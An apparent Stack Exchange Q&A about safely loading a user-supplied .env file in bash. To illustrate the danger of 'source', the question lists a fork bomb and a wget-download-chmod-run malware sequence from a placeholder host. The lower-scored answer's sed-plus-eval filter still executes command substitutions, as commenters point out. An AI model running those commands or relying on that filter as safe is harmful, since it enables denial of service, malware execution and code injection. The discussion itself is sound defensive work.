# How to load safely a .env file given from command line argument?

Tags: bash

I have the following script:

```
#!/usr/bin/env bash

if [ "$#" -eq 0 ]; then
  echo "No argument has been provided"
  exit -1
fi

ENV_FILE=$1

source $ENV_FILE
```

As you can see script's user provides a `.env` file that must contain environmental variables. The `$ENV_FILE` contains the path of the `.env` file that contains theenvironmental variables.

For my script the `.env` file needs to contain key-pair value such as:

```
KEY1=VALUE1
KEY2=VALUE2
KEY3=VALUE3
```

But on the code above seem like a bad idea to just `source` a random text file that is provided for environmental variable.

For example if the .env file is:

```
KEY1=VALUE1
KEY2=VALUE2
KEY3=VALUE3

:(){ :|: & };:
```

Or if it contains something like:

```
KEY1=VALUE1
KEY2=VALUE2
KEY3=VALUE3

wget https://malicisoussite.com/mallware -o /usr/bin/mallware
chmod +x ./mallware
./mallware
```

As you can see, the `source` command just loads the .env file as a bash script. Therefore, it can contain malicious code as well beyond the expected environmental variable assignment.

So how I can ensure that file only contains `KEY=VALUE` pairs?

Comment: you'll have to be clear on what kinds of input formats need to be supported. You mentioned quotes in a comment on an answer, but there's no mention of them here, nor did you tell exactly what kind of quoting syntax you want to support. Is the idea to support everything the shell does, but somehow do it without  running any actual shell code (e.g. with `source`)? Or do you just want some way of representing arbitrary one-line strings?

Comment: I tried to see if `.env` files are defined somewhere, and found e.g. this: https://www.npmjs.com/package/dotenv It describes quotes and a few things that aren't comparible with the shell (e.g. support for `\n` in doublequoted strings) And then there's this, which basically describes (sourced) shell script: https://www.ibm.com/docs/en/aix/7.2?topic=files-env-file

Comment: @ilkkachu question edited. Now much clearer

Answer (score 1):

### One way to sanitize your input would be:

```
#!/usr/bin/env bash

### Your previous code here ###

env_file=$1

if ! perl -ne '/^\w+=[\047\042\w\s\.-]+\s*$|^\s*$/
        or die "Suspicious line $_"' "$env_file"
then
    msg="suspicious source file detected from $env_file"
    logger -t $0 "$msg"
    mail -s "$0 $msg" you@example.org < "$env_file"
    exit 1
else
    . "$env_file"
fi
```

### It then allow only variations on :

```
key=value
KEY='VALUE'
Key="v"
K_e_y=value
k=v 
k=_v_a_l_u_e
k=v-a-l-u-e
k='v a l u e'
...
```

### The regular expression matches as follows:

| Node | Explanation |
| --- | --- |
| `^` | the beginning of the string |
| `\w+` | word characters (a-z, A-Z, 0-9, _) (1 or more times (matching the most amount possible)) |
| `=` | = |
| `[\047\042\w\s\.-]+` | any character of: '\047', '\042', word characters (a-z, A-Z, 0-9, _), whitespace (\n, \r, \t, \f, and " "), '.', '-' (1 or more times (matching the most amount possible)) |
| `\s*` | whitespace (\n, \r, \t, \f, and " ") (0 or more times (matching the most amount possible)) |
| `$` | before an optional \n, and the end of the string |
| `|` | OR |
| `^` | the beginning of the string |
| `\s*` | whitespace (\n, \r, \t, \f, and " ") (0 or more times (matching the most amount possible)) |
| `$` | before an optional \n, and the end of the string |

Comment: Sometimes I need to provife values with quotes as well. Regex needs some extra work.

Comment: Done, using `ascii` escape sequences for both `'` and `"`

Comment: this looks like it'd disallow inputs like `foo="asdf asf"` or `value='$5'`

Comment: OP is a developer, I gues he knows how to modify a regex, and he is not just a copy/paste guy ;)

Answer (score -1):

A better approach seems to me this one:
https://askubuntu.com/a/886884

We uses a typical sed and eval in order to provide environmental variables:

```
#!/usr/bin/env bash

if [ "$#" -eq 0 ]; then
  echo "No argument has been provided"
  exit -1
fi

ENV_FILE=$1

if [ ! -f "$ENV_FILE" ]; then
  echo "No ENV file has been provided"
  exit -1
fi

ENV_CONTENT=$(cat $ENV_FILE | sed -r '/[^=]+=[^=]+/!d' | sed -r 's/\s+=\s/=/g')
eval $ENV_CONTENT
```

If eval not supported then:

```
#!/usr/bin/env bash

if [ "$#" -eq 0 ]; then
  echo "No argument has been provided"
  exit -1
fi

ENV_FILE=$1

if [ ! -f "$ENV_FILE" ]; then
  echo "No ENV file has been provided"
  exit -1
fi

cat $ENV_FILE | sed -r '/[^=]+=[^=]+/!d' | sed -r 's/\s+=\s/=/g' > $ENV_FILE.sane

source $ENV_FILE.sane
```

Comment: 'eval' is a common misspelling of 'evil'. If eval is the answer, surely you are asking the wrong question. See http://mywiki.wooledge.org/BashFAQ/048

Comment: @GillesQuenot `eval` is often misused but it does have a purpose. For instance, [`modules`](https://modules.readthedocs.io/en/latest/) uses it to make changes to the user's environment.

Comment: I'm pretty sure `eval` is standard, so there shouldn't be any risk of it not being supported. In fact, I think `source` is a nonstandard alias for `.`. Both have the issue that you better be sure not to have any unsafe inputs as you're running the input as shell code. E.g. here, any command substitutions in the input would run, which may or may not be what you want. (If you want to support the shell's quoting syntax in full, but _not_ command substitutions, the sanitization is going to be rather awkward to do.)

Comment: Isn't `. <(sed -r '/[^=]+=[^=]+/!d' $ENV_FILE | sed -r 's/\s+=\s/=/g')` simpler?